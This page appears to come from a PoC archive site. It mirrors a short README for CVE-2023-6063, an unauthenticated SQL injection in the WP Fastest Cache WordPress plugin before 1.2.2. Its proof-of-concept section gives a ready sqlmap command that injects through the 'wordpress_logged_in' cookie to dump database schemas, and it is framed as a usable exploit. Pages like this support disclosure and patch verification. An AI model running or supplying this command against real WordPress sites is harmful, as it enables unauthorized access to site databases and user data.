Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2023-6063 PoC — WP Fastest Cache < 1.2.2 - Unauthenticated SQL Injection

Source
Associated Vulnerability
Title:WP Fastest Cache < 1.2.2 - Unauthenticated SQL Injection (CVE-2023-6063)
Description:The WP Fastest Cache WordPress plugin before 1.2.2 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by unauthenticated users.
Description
CVE-2023-6063 (WP Fastest Cache < 1.2.2 - UnAuth SQL Injection)
Readme
# CVE-2023-6063 PoC

## Reference

- [Unauthenticated SQL Injection Vulnerability Addressed in WP Fastest Cache 1.2.2 | WPScan](https://wpscan.com/blog/unauthenticated-sql-injection-vulnerability-addressed-in-wp-fastest-cache-1-2-2/)

## Plugin setting

Enable "WP Fastest Cache".

![Image 1](/image_1.png)

## PoC

The "wordpress_logged_in" cookie parameter is vulnerable.

```
$ python sqlmap.py --dbms=mysql -u "http://127.0.0.1/wp-login.php" --cookie='wordpress_logged_in=*' --level=2 --schema
```

![Image 2](/image_2.png)
File Snapshot

[4.0K] /data/pocs/af9f4a8f207eb3c5ac65ec5da204d491fe20d906 ├── [263K] image_1.png ├── [157K] image_2.png └── [ 528] README.md 0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →